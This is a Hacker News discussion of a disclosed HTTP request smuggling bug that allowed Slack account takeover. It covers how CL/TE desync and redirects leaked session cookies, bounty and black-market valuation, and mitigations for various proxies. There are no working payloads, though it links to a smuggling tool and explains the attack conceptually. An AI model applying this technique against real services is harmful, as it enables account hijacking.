[HN Gopher] Slack account takeovers using HTTP Request Smuggling
       ___________________________________________________________________
        
       Slack account takeovers using HTTP Request Smuggling
        
       Author : bartkappenburg
       Score  : 329 points
       Date   : 2020-03-13 15:19 UTC (7 hours ago)
        
 (HTM) web link (hackerone.com)
 (TXT) w3m dump (hackerone.com)
        
       | Bhilai wrote:
       | Original Paper for those interested -
       | https://portswigger.net/research/http-desync-attacks-request...
        
       | gavingmiller wrote:
       | Anyone know if the `smuggler` tool used is available online?
       | Can't find any reference to it in github or elsewhere, and I'm
       | not familiar with it.
       | 
       | Edit: Found it here: https://github.com/gwen001/pentest-
       | tools/blob/master/smuggle...
        
         | dt3ft wrote:
         | Thank you, I was looking for this as well.
        
       | phonebucket wrote:
       | I'm impressed by how competent and professional some independent
       | security researchers are.
       | 
       | How do people learn this stuff? Are there any resources that
       | anyone here can recommend?
        
         | JMTQp8lwXL wrote:
         | In this particular instance, it's a savvy understanding of the
         | HTTP protocol. Both the 'Transfer-Encoding' and 'Content-
         | Length' headers have opposite goals: one says how many bytes of
         | response body data there is; the other signals that it is
         | limitless until (IIRC) an empty newline is transmitted.
         | 
         | Realizing that different systems resolve the question of "Well,
         | what should I (the system) do when I get both headers?" and you
         | realize you can break the atomicity of the HTTP request-- which
         | opens up a really interesting (and severe) class of exploits.
         | 
         | I'm not very good at finding vulnerabilities, beyond the
         | obvious sql-injection attack types that we are generally
         | trained to avoid. I imagine, however, getting good at finding
         | these is a skill that can be learned with time. Alternatively,
         | finding vulnerabilities might be more akin to pharmaceutical
         | developments: with a 1,000 swings, you're missing at least 950
         | of them, or more. A dash of luck in there.
        
           | tptacek wrote:
           | It probably helps to know that this particular bug was a
           | major announcement at Black Hat last year, by James Kettle,
           | who is a vulnerability research celebrity. So lots of people
           | are looking for this particular bug.
           | 
           | Black Hat talks are eventually published online for free;
           | here's this one:
           | 
           | https://www.youtube.com/watch?v=upEMlJeU_Ik
        
             | JMTQp8lwXL wrote:
             | Given how widely publicized request smuggling was, I'm
             | surprised it's still a problem for apps with large user
             | bases like Slack.
        
               | lonelappde wrote:
               | Other commenters note that some platforms intentionally
               | leave this vuln open because closing it breaks some buggy
               | clients. Convenience over security.
        
       | wpietri wrote:
       | I was unfamiliar with request smuggling; here's an explainer:
       | https://portswigger.net/web-security/request-smuggling
       | 
       | The first in-band signalling attack I came across was the blue
       | box [1], invented in the late 1960s. It still occasionally worked
       | in the 1980s on older phone systems. It amazes me that we're
       | still creating new systems vulnerable to in-band attacks.
       | 
       | [1] https://en.wikipedia.org/wiki/Blue_box
        
         | abhishekjha wrote:
         | Is it what Steve Jobs and his friend used to hijack telephone
         | lines and call the pope, free of cost?
        
           | acruns wrote:
           | Yes. https://www.inc.com/glenn-leibowitz/in-a-rare-23-year-
           | old-in...
        
           | AnIdiotOnTheNet wrote:
           | Of all the places on the internet to hear Steve Wozniak
           | referred to simply as Steve Jobs's friend...
        
             | abhishekjha wrote:
             | Sorry, I didn't realise that other friend in this incient
             | was Steve Wozniak specifically. I saw his interview after
             | his return to Apple.
        
         | lonelappde wrote:
         | How can you avoid in-band attacks? I'm not going to send a
         | postcard to a webserver with metadata about every HTTP request.
        
           | wpietri wrote:
           | The phone system switched call routing from in-band
           | signalling (that is, tones you could hear on the wire) to
           | out-of-band signalling (where control information went over
           | separate channels to content).
           | 
           | Another approach is reliable encapsulation. Ethernet and
           | TCP/IP, for example, are technically all in one channel. But
           | packet content won't be mistaken for protocol information.
           | You could also look at things like SSH and how it has
           | multiple channels: https://tools.ietf.org/html/rfc4254
           | 
           | I'm sure there are other approaches, too, and I hope people
           | will mention them.
        
         | JangoSteve wrote:
         | Can someone explain the redirect/cookie-stealing part of this?
         | I read through the post explaining request smuggling, and then
         | re-read their exploit description, and the request smuggling
         | part all makes sense. However, I don't fully understand the
         | significance of the 301 in relation to the browser sending the
         | attacker's server the cookie with the request.
         | 
         | If the back-end server is already proxying whatever request it
         | receives from the front-end proxy server, why was it necessary
         | to first get it to redirect an HTTP 1.1 header to an https
         | request? The only thing I could think of was that maybe it has
         | something to do with getting the unencrypted cookie, but
         | according to their description, the forwarded request with the
         | cookie doesn't happen until after the redirect to https anyway.
         | 
         | I know I'm missing something obvious here.
        
           | terom wrote:
           | The collab_2.png screenshot shows `User-Agent: ...
           | Slack/4.1.2 ... Electron/6.0.10 ...`, so it's their own
           | desktop app doing the https://slackb.com/... HTTP 301 ->
           | https://*.burpcollaborator.com request. Perhaps their client
           | implements its own quirky redirect-following, which keeps the
           | the original `Cookie: ...` headers in the redirected request?
           | 
           | I find it hard to believe that any browser would keep the
           | original `Cookie: ...` headers in a redirected request to a
           | different origin.
        
             | londons_explore wrote:
             | Some proxies follow redirects... It enables devs to do
             | things like "redirect request to the old server", and the
             | client never needs to know (which is important for
             | maintaining compatibility with an old api)
             | 
             | In that case, I'd expect all cookies etc. to be forwarded.
        
             | JangoSteve wrote:
             | Interesting! That's definitely something I missed, thank
             | you.
             | 
             | I still wouldn't expect an Electron app to subvert basic
             | browser sandboxing by default, particularly where they
             | wouldn't have expected to need to redirect users to other
             | domains with cookies intact. It seems like they'd need to
             | go out of their way to enable that.
             | 
             | I wonder if it has to do with the sign-in tokens they send
             | or otherwise allowing the user to move between the browser
             | and the app within their account. For example, when you're
             | in the app and click "Manage Users" and it sends you to a
             | management dashboard in the browser. or when you click a
             | link with an auth token in the browser and it launches you
             | into the app.
        
           | tptacek wrote:
           | What's subtle is that the middlebox is being tricked into
           | parsing the body of an HTTP request as the envelope, or vice
           | versa. The requests hitting the backend are being scrambled.
           | The browser is doing what it can to ensure cookies only go to
           | the right domain, but the servers are chopping those careful
           | requests up and sending them to random places.
        
             | bawolff wrote:
             | Are you're saying its the slack's frontend server that is
             | processing the 301, and not the user's web browser? And
             | that slack's front-end server is configured as such that
             | when it gets a 301 it just resends the entire request
             | (including all headers) to the redirect destination?
             | 
             | Edit: this seems likely to not be what he was saying and
             | also not the case.
        
             | jorams wrote:
             | > the servers are chopping those careful requests up and
             | sending them to random places.
             | 
             | I understand that the backend is parsing different requests
             | than the frontend, but I don't see how the cookies ever get
             | sent to the attacker's domain.
             | 
             | I understand three requests as moving like this:
             | 1. attacker -> frontend -> backend (partially) -> frontend
             | -> attacker         2. victim -> frontend -> backend
             | (including a bit of 1) -> frontend -> victim         3.
             | (after 301) victim -> malicious server
             | 
             | The second request results in a 301, causing the victim's
             | client to make a new request to the target of the 301. This
             | new request does not include cookies, because it is to a
             | different domain.
             | 
             | What am I misunderstanding? When do the cookies get sent to
             | the malicious server?
        
               | tptacek wrote:
               | Alongside a legitimate request with cookies, there is
               | queued an evil request that uses mismatched Content-
               | Length and chunked encoding headers to graft the body of
               | the evil request to the envelope of the legitimate
               | request. The evil body becomes the envelope for the
               | entire legitimate request, and the evil envelope
               | generates the redirect.
               | 
               | Skip down to the "Explanation of malicious request"
               | section.
        
               | JangoSteve wrote:
               | All of your explanation (which is appreciated) just
               | further describes the request smuggling, not how that
               | ends up sending the slack cookies to the hackers server.
               | 
               | If you take all of this together, it's all leading to
               | Slack's back-end server returning to the user's client a
               | 301 response that tells the user's browser to send a new
               | request to the hacker's domain. However, when the browser
               | does this, it's to a different domain, so typically the
               | slack cookies would not get sent with that request,
               | unless I'm missing something.
               | 
               | The "Explanation of malicious request" section doesn't
               | explain this, either. All it explains is that all this
               | effort was to get Slack's server to send a 301 response
               | to the user's browser pointing to the hacker's server,
               | but then it glosses over any information about how the
               | cookies are getting sent with a single sentence, "and all
               | cookies (including 'd') get redirected there too.... :("
               | 
               | My question is, how?
               | 
               | Is something going on where Slack's back-end servers are
               | explicitly setting response headers that allow their
               | cookies to be sent to the hacker's domain? Is there some
               | additional vulnerability that's allowing the browser to
               | send the cookie across domains on a 301 redirect?
        
               | justicz wrote:
               | If you zoom in on the last image in the report, you see
               | that the victim's client is not a web browser, but
               | Slack's Electron-based client. Perhaps that client is
               | willing to send Slack cookies cross-domain after a
               | redirect for an auth'd request?
               | 
               | Edit: looks like terom above me had the same idea before
               | I did
        
               | jorams wrote:
               | I get that the evil body essentially gets prefixed to the
               | legitimate request, making the server generate the
               | redirect, but this redirect is returned to the victim.
               | The victim then makes a request to the malicious server,
               | and this request should not contain cookies because the
               | origin is different. How do the cookies get to the
               | attacker?
        
           | kbenson wrote:
           | The hackerone write up which this submission points to
           | actually goes into explicit detail on what happens step by
           | step, along with nice infographics.
           | 
           | The TL;DR is that you can make the front-end see something
           | like GET /my/supplied/url\nX:X at the end of your request,
           | but the back-end see it as the beginning of the next request,
           | (and the X:X turns the real GET/POST whatever info a custom
           | header of X:XGET /real/request/url), and Slack returns that
           | request with cookies for that person, but to a domain
           | controlled by you when it comes back. The diagrams included
           | in the post and the accompanying text do a better job of
           | explaining it than I am, I think.
        
             | bawolff wrote:
             | I'm also similarly confused. The post explains request
             | smuggling really well, but doesn't really explain how that
             | equals getting the victim's cookies.
             | 
             | This is my understanding of the bug:
             | 
             | * Attacker sends malformed request to slack servers.
             | Request gets split in two. First part results in something
             | sent back to attacker, next part of request is treated as a
             | prefix to the next legit (victim's) http request made
             | 
             | * Slack backend server responds to victim's request
             | treating it as having part of the attacker's request
             | prefixed. The merged request results in a 301 http redirect
             | response, redirecting the victim to an attacker controlled
             | domain.
             | 
             | * Victim's browser gets the 301, and follows the redirect.
             | When following the redirect, _the cookie header is somehow
             | sent to the attacker 's site_ <-- Part i don't understand
             | here
             | 
             | I don't understand why the victim's browser would send the
             | cookie header when following a redirect to a different
             | domain. I don't understand how causing the victim to follow
             | a cross-domain redirect would allow the attacker to extract
             | the victim's cookie.
        
               | JangoSteve wrote:
               | Yes, this was precisely my question. I agree with you
               | that the post does a great job of explaining the how
               | request smuggling works, and how they used it to trick
               | Slack's server into responding to the user's client with
               | a 301 redirect to the hacker's server. But then, when
               | they got to the part where the cookies are sent, they
               | just said, "and the cookies are sent" with no further
               | explanation.
               | 
               | That's the part I'm stuck on. Is there some browser
               | behavior I'm not remembering where it sends sensitive
               | cookies across domains just because one redirected the
               | browser to the other?
        
               | Matt3o12_ wrote:
               | I think this rather applies to API clients which can
               | handle that differently. A quick test for python's shows
               | that all headers are redirect regardless:
               | requests.request("GET", "http://localhost/redirect-
               | to?url=http%3A%2F%2Fhttpbin.org%2Fget", headers={"x-foo":
               | "bar", "Cookies": "abc=dcv;"}).json()              {
               | "args": {},         "headers": {           "Accept":
               | "*/*",           "Accept-Encoding": "gzip, deflate",
               | "Cookies": "abc=dcv;",           "Host": "httpbin.org",
               | "User-Agent": "python-requests/2.22.0",
               | "X-Amzn-Trace-Id":
               | "Root=1-5e6bebe1-cd6e71729a818015a06aa7cb",
               | "X-Foo": "bar"         },         "origin":
               | "91.58.8.128",         "url": "http://httpbin.org/get"
               | }
               | 
               | I'm running a local copy of httpbin on localhost, so
               | python's request should not send sensitive headers for
               | redirects but it does. Golang is a bit more explicit
               | about it's http client behavior:
               | 
               | > * when forwarding sensitive headers like
               | "Authorization", "WWW-Authenticate", and "Cookie" to
               | untrusted targets. These headers will be ignored when
               | following a redirect to a domain that is not a subdomain
               | match or exact match of the initial domain. For example,
               | a redirect from "foo.com" to either "foo.com" or
               | "sub.foo.com" will forward the sensitive headers, but a
               | redirect to "bar.com" will not.
               | 
               | https://golang.org/pkg/net/http/#Client
               | 
               | Though this might also cause problems if you are using
               | sensitive non standard headers such as X-Token for token
               | authentication, etc.
               | 
               | So while you could probably mitigate this vulnerability
               | on some clients, you are trusting the server to only
               | redirect you to trusted URLs which is not the case here.
        
               | bawolff wrote:
               | Hmm that would make sense. The user-agent header does
               | have "slack" in it so probably not a web browser, and its
               | not far fetched that most libraries dont implement the
               | same origin policy when it comes to headers and
               | redirects.
        
         | sixstringtheory wrote:
         | Wow, I was fascinated by phreaking when I was younger and first
         | getting into programming. Been working on mac/iOS for years and
         | never knew that the guys responsible for the most enjoyable
         | part of my career, the Steves, built and sold a blue box!
        
           | at-fates-hands wrote:
           | Of all the stories I heard, Woz was way more interested in
           | using them. When Jobs found it out it was illegal, he dropped
           | selling them and distanced himself from the other phreakers
           | he was hanging out with, too afraid of the legal
           | ramifications of getting caught with this equipment.
           | 
           | Most of the books I've read basically paint Jobs as a goody-
           | two-shoes type who cringed at the illegality of phreaking -
           | while saying he probably was thinking ahead, knowing he
           | already wanted to start his own company and didn't want stuff
           | like this to come back and haunt him.
           | 
           | It was an interesting dichotomy to me.
        
       | lala26in wrote:
       | I read it and didn't understand now questioning my software
       | engineering career choices.
        
       | anonfunction wrote:
       | > Re: disclosure - a redacted disclosure will be fine, but we'll
       | need to hold off for a little bit while we perform our
       | investigation. We'll keep you updated in the meantime, and once
       | we've concluded there wasn't a customer impact we can disclose
       | this. Thanks for your patience!
       | 
       | Does this mean they wouldn't want to disclose it if the same
       | exploit was used against users by another hacker?
        
         | jessaustin wrote:
         | Maybe they could have had similar vulnerabilities in other
         | parts of their stack?
        
         | jaywalk wrote:
         | No, it means they'd want affected customers to hear it from
         | them first.
        
       | fiberoptick wrote:
       | Wow, an ATO exploit that only received a $6,500 bounty? This
       | signals to grey-/black-hat researchers that their research
       | efforts or Slack bug disclosures are best directed elsewhere..
        
         | xyst wrote:
         | Probably took weeks to build his own suite of automated tests
         | for these types of exploits. All he has to do at this point is
         | reconfigure the scripts to point to a new site/app with a
         | bounty program, post report, and reap the benefits.
         | 
         | Assuming he has done this for several other companies, I would
         | say he has effectively earned more than what is put in
        
         | NikolaeVarius wrote:
         | The literal hacker themselves indicated it was a fair payout.
         | 
         | I don't understand unsolicited complaining for other people.
        
           | kjaftaedi wrote:
           | They're not 'complaining' about the amount in the way that
           | you're thinking.
           | 
           | They're suggesting that the severity of such a bug warrants a
           | larger payout, because not doing so creates possible
           | incentives for future explorers to consider selling these
           | sorts of things on the black market.
           | 
           | This person may be satisfied, the next person that finds
           | something similar may think twice.
        
           | whiskeykilo wrote:
           | It's a free market. Don't like the payout? Don't submit the
           | bug. Someone else probably will anyway
        
           | [deleted]
        
           | pathseeker wrote:
           | >I don't understand unsolicited complaining for other people.
           | 
           | If you observe someone getting paid a much lower-than-market
           | amount for something you can complain that the company is
           | being cheap and likely driving away a lot of potential
           | sellers (security researchers in this case) regardless of how
           | happy the one person is.
        
             | tptacek wrote:
             | This is not a below-market rate.
        
               | fiberoptick wrote:
               | I noticed that throughout this thread you have been
               | making this assertion. Could you share any data or
               | citations to support this?
               | 
               | Would you feel any differently about the value of this
               | bug if it affected, e.g. Google or Facebook?
        
               | tptacek wrote:
               | No, I would not feel differently about it. The same
               | dynamic would apply.
               | 
               | People on HN seem generally to believe that for any
               | malicious activity you could do with a bug, there's a
               | bidding group of willing buyers somewhere on some darknet
               | site. That's not the case. Random bugs like this may get
               | passed around, but the bugs that command a price all fit
               | a couple specific molds: they're things you can drop into
               | someone's existing operational process.
               | 
               | A Firefox drive-by RCE has some value: many organizations
               | are set up to actively exploit Firefox browsers. So does
               | an iOS jailbreak: lots of people stockpile iOS
               | jailbreaks, for malware implants and for other purposes.
               | 
               | An important common thread among the bugs with liquid
               | markets is that they have a meaningful half-life: once
               | they're burned, it still takes time to eradicate the
               | vulnerable installations. Serverside bugs are fixed
               | worldwide instantaneously. You can see this dynamic in
               | how grey-market payments are tranched.
        
               | pathseeker wrote:
               | This ignores the black market. This exploit would have
               | been extremely valuable to insider trading rings.
        
           | empath75 wrote:
           | I do wonder what the FSB would have paid for it tho.
        
         | edoceo wrote:
         | How much should they have been paid? This seems like a week of
         | pay for a pretty good software dev. That's not fair comp?
        
           | vlovich123 wrote:
           | The value is not about the time spent finding the bug. It's
           | about the severity of the issue, the scale, & the competitive
           | cost of me selling it on the black market. If Apple left open
           | a 0-day rootkit exploit that took me somehow 1 day to find
           | it's still worth hundreds of thousands of dollars.
        
             | vasco wrote:
             | Well yeah if your comparison is that the person's morals
             | allow them to just turn around and sell it in the black
             | market, maybe they could've paid more. But the reality of
             | HackerOne is that most people are really just doing it as a
             | hobby or side project that happens to generate cash.
             | 
             | Some people build 10 different static website generators,
             | others do bug bounties. It doesn't mean they'd go on to
             | sell these exploits and risk going to jail.
        
               | QuinnWilton wrote:
               | It's not the people using HackerOne to be concerned
               | about. It's the ones who don't use HackerOne because they
               | realize they'd get more money on the black market.
               | 
               | When it comes to vulnerabilities with a large enough
               | impact it isn't enough to learn about most of them,
               | because all it takes is one financially motivated actor
               | to weaponize things.
        
               | tptacek wrote:
               | There is almost certainly no liquid black market for this
               | bug, even though Slack is very important to lots of
               | businesses. It had no half-life at all (the fix was one-
               | and-done) and doesn't fit into any existing
               | business/operational model (nobody has an infrastructure
               | where different targeted Slack bugs are pin-compatible
               | drop-ins).
        
             | floatrock wrote:
             | This thread is interesting because it shows different ways
             | people value their work.
             | 
             | This is reasonable if you look at it as "just another job"
             | -- you're being paid to build Good Software, so just
             | another day at work. Or you're doing a Good Thing by
             | helping a lot of people not get pwned.
             | 
             | This is unreasonable if you look at is as value-creation:
             | "how much is this worth on the black market" or "what is
             | this worth to Slack as a company".
             | 
             | Other people can get into the socioeconomic or means-of-
             | production or entrepreneuring implications of all this, but
             | I just think whether you downvoted or upvoted this provides
             | a useful mirror into how one values one's own professional
             | work.
        
               | londons_explore wrote:
               | And then there are the people who want to be paid
               | whichever is the higher of the two approaches.
        
             | CameronNemo wrote:
             | This assumes the researcher is indifferent to white/black
             | hatting. In all likelihood, the researcher may have some
             | personal preference to be a white or black hat, and it
             | could depend on the ethics of the company in question.
             | 
             | There is also the cost of the likelihood of being caught
             | while selling vulnerabilities on the black markets. If
             | fascists have some personal stake in the company, black
             | hatting would likely involve more careful and high stakes
             | anonymity measures. Remember that US federal law
             | enforcement agencies operate tor exit nodes!
        
             | SamuelAdams wrote:
             | I'm genuinely curious about this. If you ask for black-
             | market rate compensations for disclosing a vulnerability,
             | how is that not extortion? "Pay me this sum or I / someone
             | will use this against you." seems to be what you are
             | suggesting.
        
               | vlovich123 wrote:
               | I think you're looking at this from not quite the
               | perspective I'm taking. I'm not saying that any
               | individual is going to go "Pay me this or I will attack
               | you. No that's not enough. I want $X". That is extortion
               | of course.
               | 
               | I'm looking at it from the perspective of the market
               | economics. Reward programs are about incentivizing people
               | to do responsible disclosure. If the market (i.e. the
               | black market here) pays significantly higher for an
               | exploit then a reasonable company will try to reflect
               | their payout to match what the "market" has valued that
               | exploit to be worth. This way someone who would
               | _otherwise_ have sold on the black market may be
               | incentivized to do responsible disclosure instead
               | (significant payout, maybe not as high but 100% legal  &
               | no legal risk). It's all about shifting the incentives
               | and structure before people even make any decision. I
               | think it's silly that companies get dinged that
               | responsible disclosure programs don't pay out at the same
               | rate as the black market. There's a legal risk element
               | their not factoring into the math. But it should be
               | roughly comparable (my uneducated gut check is within
               | ~20%).
               | 
               | Think of it like drugs. Marijuana on the black market is
               | cheaper. People still opt to buy legal marijuana even
               | though it's slightly more expensive because it's safer,
               | legal, & vendors are accountable to their customers &
               | community. If the cost grows too large then the black
               | market starts to grow again (e.g. cigarettes are a
               | notorious example of this due to taxation as an attempted
               | lever to kill it).
        
               | tptacek wrote:
               | The black market does not outbid bounties for this kind
               | of bug.
        
               | [deleted]
        
               | vlovich123 wrote:
               | Good to know. Is there some resource you use to track
               | this kind of stuff?
        
               | tptacek wrote:
               | Nothing super authoritative; mostly from talking to
               | people who've done it. But: there's Maor Schwartz's
               | excellent Black Hat talk from last year:
               | 
               | https://i.blackhat.com/USA-19/Wednesday/us-19-Shwartz-
               | Sellin...
               | 
               | And you can always look at things like the Zerodium Price
               | List. I don't know that it's taken very seriously in its
               | particulars, but the general structure of it mirrors what
               | I've heard from other sources.
               | 
               | You'll notice on the Zerodium list that they will pay for
               | serverside RCE in web apps --- but only a particular kind
               | of web app: the kind that is deployed in lots of places.
               | National IC agencies will, for instance, pay for phpBB
               | RCE, because they have targets that use phpBB, and there
               | are lots of phpBB's (when you hear people talking about
               | how valuable a web bug is, ask yourself whether that
               | person has mentioned the weird market for phpBB bugs ---
               | something I've had firsthand [refused!] experience with).
               | What you won't see are bugs in SAAS applications. Again,
               | the reason is that a phpBB vulnerability has a half-life:
               | everyone has to install the patch once it's burned.
               | 
               | I have no evidence for what I'm about to say here, so
               | take it with a grain of salt:
               | 
               | I assume you _can_ get paid for a vulnerability even as
               | esoteric as this Slack ATO bug. But you 'll get paid for
               | people who are buying Slack accounts, not Slack _bugs_.
               | That is: you 'll have to be the one exploiting it, and
               | you'll be making one-off deals to use it to get targeted
               | accounts. People sell all kinds of accounts; it would not
               | surprise me even a little to hear that there was a market
               | for company Slack accounts.
               | 
               | But to participate in that market, you'd almost certainly
               | have to directly enter a criminal conspiracy. You
               | wouldn't be selling a bug to a market; you'd be
               | participating.
        
           | lonelappde wrote:
           | If he worked a week and didn't find a vuln, he'd get 0.
           | Average that in.
           | 
           | Bug bounties are the uberification of security research.
        
           | penagwin wrote:
           | > This seems like a week of pay for a pretty good software
           | dev.
           | 
           | Wait, 6500 * 4 * 12 = 312,000/yr
           | 
           | Might be a bit high for a week :P
           | 
           | EDIT: Okay turns out that if you live in the Bay area this
           | isn't unheard of - the rest of us make 4x to 5x less then
           | that (Saying this as a mid-level software dev from West
           | Michigan).
        
             | sciurus wrote:
             | That matches up with the mid to senior range you'll see for
             | FAANG at https://www.levels.fyi/
        
             | bluedino wrote:
             | 60-75k is on the low side for a qualified dev, even in
             | Michigan.
        
             | randlet wrote:
             | Salary information on HN is skewed by Bay area engineers
             | where $312k is not out of the realm of possibility for a
             | senior developer afaik.
        
             | moneromoney wrote:
             | In Germany you will be VERY lucky making 100,000 euro /
             | year. Germany has the lowest
             | 
             | software dev. salary / average country salary
             | 
             | ratio of all countries on planet.
        
               | foepys wrote:
               | Unless you are doing anything more or less related to
               | SAP. Then you can make $150k/a easily.
               | 
               | If only other companies would realize that that's one of
               | the reasons why SAP is Germany's no. 1 software company.
        
           | tptacek wrote:
           | It is, as the bounty reporter says themselves, eminently
           | fair. People on this site have very weird ideas of what the
           | going rates for bounties are.
        
             | sarakayakomzin wrote:
             | The bounty hunter isn't a source of truth for the value of
             | the bug. If you don't think you could sell an exploit to
             | takeover any slack account for more than $6500 then you
             | aren't familiar with what the market values in the first
             | place.
        
       | arkadiyt wrote:
       | Protecting against request smuggling:
       | 
       | - If you don't have a proxy fronting traffic, no action required
       | 
       | - If you're behind Fastly/Cloudflare [1] or Akamai [2], no action
       | required / they protect against this attack
       | 
       | - If you're behind AWS Cloudfront, no action required / they
       | protect against this attack
       | 
       | - If you're behind AWS ALB, you're vulnerable by default but can
       | opt-in to protection by enabling the
       | "routing.http.drop_invalid_header_fields.enabled" attribute [3].
       | They initially had it on by default but it broke customers
       | 
       | - If you have a different proxy (e.g. some other provider or your
       | own nginx, haproxy before 2.0.6 [2], etc), you might be
       | vulnerable
       | 
       | [1]: https://portswigger.net/research/http-desync-attacks-
       | request...
       | 
       | [2]: https://portswigger.net/research/http-desync-attacks-what-
       | ha...
       | 
       | [3]:
       | https://docs.aws.amazon.com/elasticloadbalancing/latest/APIR...
        
         | [deleted]
        
         | judge2020 wrote:
         | Regarding Cloudflare/fastly, you do need to make sure you're
         | only allowing requests that originate from the proxy, either
         | via IP-based firewall rules or something like CF's
         | authenticated origin pulls [0]. Otherwise someone could find
         | your origin server's IP and potentially perform this attack
         | (and generally bypass your security settings).
         | 
         | 0: https://support.cloudflare.com/hc/en-
         | us/articles/204899617-A...
        
           | tialaramex wrote:
           | Allowing Connections to your backend directly _might_ make
           | you vulnerable to certain types of attack but it doesn 't
           | impact Request Smuggling.
           | 
           | The trick in Request Smuggling is that you're trusting an
           | intermediary (in this case a frontend reverse proxy) to
           | mingle everybody's requests into a single pile for you to
           | process and they don't agree with you about how to do this.
           | Chuck thus gets to submit a request which is mingled with
           | Alice's and you end up letting Chuck modify Alice's request.
           | Oops.
           | 
           | But Chuck sending requests directly to your backend doesn't
           | allow him to do this. You're definitely not going to think
           | Chuck's weird garbled nonsense is part of Alice's request
           | when it isn't even on the same TLS connection.
        
           | ckuehl wrote:
           | Also keep in mind that if you use IP-based whitelisting, an
           | attacker can register their own CF/Fastly account and target
           | your origin server with whatever CDN settings they want
           | (assuming they can discover your origin server). With Fastly
           | at least you can even do this from the free tier.
        
             | jaywalk wrote:
             | Took me a second to wrap my head around what you were
             | saying, so I'll point it out: they'd be pointing their CDN
             | account to your origin server, and making requests through
             | it.
        
               | judge2020 wrote:
               | Same for Cloudflare - to mitigate this your server should
               | only respond to the correct HOST header for your website.
        
         | jackewiehose wrote:
         | > If you have a different proxy (e.g. some other provider or
         | your own nginx, haproxy before 2.0.6 [2], etc), you might be
         | vulnerable
         | 
         | So I think I'm vulnerable because my setup is nginx->customhttp
         | and my customhttp doesn't understand transfer-encoding-chunked
         | (if there is such a request I just return an error).
         | 
         | As far as I understand this problem only arises if there is
         | both: content-length and transfer-encoding, in which case
         | content-length will be ignored.
         | 
         | Shouldn't this attack be very easily avoided if nginx just
         | discards the content-length-header in such cases? Why should
         | nginx ever send both to the backend?
        
           | tialaramex wrote:
           | (I'm assuming here that customhttp means you've got hand-
           | rolled code and isn't somebody's terrible name for their
           | product)
           | 
           | If your customhttp isn't smart enough to handle Chunked
           | encoding it might also just always Connection: Close every
           | request or even just act like an HTTP/0.9 server, in which
           | case it isn't vulnerable.
           | 
           | Request Smuggling requires that both the intermediary (for
           | you nginx) and backend (your customhttp) believe it is
           | possible for one TLS connection to contain multiple HTTP
           | requests, they just disagree on where the boundaries are
           | between those requests.
           | 
           | If either of them insists that no, one TLS connection = one
           | HTTP request, that's legal (but has poor performance which
           | may or may not matter to you) and immunises against Request
           | Smuggling.
        
             | jackewiehose wrote:
             | By "customhttp" I meant my hand-rolled (subset of)http-
             | server. It doesn't support chunked encoding because I also
             | control the client-code but it does support "connection
             | keep-alive" for better performance.
             | 
             | I haven't testet it yet but I'm pretty sure its vulnerable:
             | my server just looks for content-length and if it doesn't
             | find it, it returns an error. So if nginx sends content-
             | length but then continues to send chunked content it should
             | be possible that the next request won't come from nginx but
             | from an attacker (probably not really a problem at the time
             | but nevertheless not the expected behaviour).
             | 
             | My failure was to always expect "valid" HTTP-input from
             | nginx whereas "valid" means my limited knowledge of HTTP.
             | 
             | But the question remains: Is there a reason why nginx
             | should send both headers to the backend?
        
               | tialaramex wrote:
               | If you don't implement an encoding you should obey the
               | HTTP/1.1 standard and "return 501 (Unimplemented), and
               | close the connection". In your case even though not
               | implementing chunked encoding is prohibited, this drop
               | through would save you.
               | 
               | Valid means what the standard says it means. What you
               | don't know can hurt you.
               | 
               | However, if modifying your backend code is hard, you can
               | apparently tell nginx that you don't do chunked encoding
               | and it will sort out the 501 on your behalf. I have not
               | tried this and YMMV.
        
               | jackewiehose wrote:
               | I completly agree and I'm sure nginx is doing it right by
               | following the specification but isn't this a bug in the
               | specification? Why should there be a content-length but
               | then a chunked body.
               | 
               | And if this is a bug in the specification, shouldn't
               | nginx fix it to help us backend-fools?
        
       | mcherm wrote:
       | > I did not expect for this finding to go from submit to
       | fix/bounty in a matter of 24 hours.
       | 
       | I didn't expect that either. I am very pleasantly surprised. I
       | hope my own company would do as well as Slack did here, but I am
       | not certain whether we would.
        
       | londons_explore wrote:
       | And the real lesson here is HTTP probably isn't a good protocol
       | between your proxies and your backends, and you should probably
       | use HTTP/3 to fully eliminate this entire class of bug.
        
         | SahAssar wrote:
         | HTTP/2 also works to fix this, right?
        
       | Lex-2008 wrote:
       | Greatly detailed report and impressive resolution speed, indeed,
       | but sadly it fell behind the cracks regarding disclosure.
        
         | andrekorol wrote:
         | What do you mean by "it fell behind the cracks regarding
         | disclosure"?
        
           | harrier wrote:
           | After the issue was resolved the reporter was asked to wait
           | before disclosure. The reporter waited three months before
           | asking about it again. After that there was response but it
           | took another month the approve the disclosure.
        
             | andrekorol wrote:
             | Oh, now I get it. Thanks for the clarification.
        
       ___________________________________________________________________
       (page generated 2020-03-13 23:00 UTC)